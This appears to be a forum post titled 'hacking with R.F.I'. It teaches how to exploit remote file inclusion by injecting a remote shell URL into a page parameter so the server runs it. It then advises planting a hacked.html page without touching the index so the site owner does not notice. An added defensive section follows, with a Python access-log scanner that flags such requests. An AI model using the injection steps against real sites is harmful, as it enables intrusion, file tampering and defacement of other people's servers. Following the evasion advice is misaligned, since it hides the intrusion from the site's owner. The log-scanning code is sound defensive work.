Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING
hacking with R.F.I - Printable Version




hacking with R.F.I - admin - 03-01-2015

FOR EDUCATIONAL PURPOSES ONLY!


Firstly you will need our RFI test sheet
http://pastebin.com/PJ5K8fKj

Upload that to your server and save it as RFI.php.

When you access that file via a web browser it will look like this
[Image: 1_23.jpg]


Very fancy

But the idea of this page is to open a file in the same page, kinda like an iframe.
If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (take note of the location of http://www.google.co.uk/):
[Image: 2_7.jpg]


This page is going to run anything that is after rfi.php?page= in the URL. With that in mind we now understand that a shell can be executed from the server.

So now you must upload a shell to our server.
If we don't already own a shell, we can download a free shell here:
http://www.multiupload.com/REU9V5EQAF

OK, now that it is uploaded to our server, we must inject it into the RFI test sheet, like this: http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? We include the last ? to tell the page to run the code and not to display the page/code.

Now you will see that the site has executed the shell's code as if it was part of the original page.
[Image: 1_23.jpg]


Meaning we can now upload, edit, delete any file we please.

Do not change the index of the site as the owner may catch you.
Upload a hacked.html page.
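Seen from the server owner's side, the two request shapes in the post (a `page=` value that is itself a URL, and the variant ending in `?`) are easy to pick out of an access log. The following is an added example, not part of the original post: it assumes Apache/nginx "combined"-style log lines, the log lines are constructed, and the function and field names are hypothetical.

```python
import re
from typing import NamedTuple
from urllib.parse import parse_qsl, unquote

# Assumption: Apache/nginx "combined"-style access-log lines.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A parameter value that starts with a URL scheme or a PHP stream wrapper.
REMOTE_VALUE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect)://|data:)', re.I)

class Finding(NamedTuple):
    client: str
    path: str
    param: str
    value: str            # fully decoded parameter value
    status: int
    trailing_qmark: bool  # value ends in "?", as in the thread's shell.txt? request

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253A) so an encoded scheme is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(lines):
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        path, _, query = m["target"].partition("?")
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(raw)
            if REMOTE_VALUE.match(value):
                findings.append(Finding(m["client"], path, param, value,
                                        int(m["status"]), value.endswith("?")))
    return findings

# Constructed sample log (hosts from the thread's example URLs, IPs from documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /rfi.php?page=http://www.google.co.uk/ HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /rfi.php?page=http%3A%2F%2Fwww.mysite.com%2Fshell.txt%3F HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /rfi.php?page=http%253A%252F%252Fwww.mysite.com%252Fshell.txt%253F HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /rfi.php?page=about HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 2048',
]
```

A legitimate redirect parameter that carries a full URL would also match, so findings are best reviewed per endpoint; a 200 status on a flagged request to a script that includes its parameter is the case to look at first.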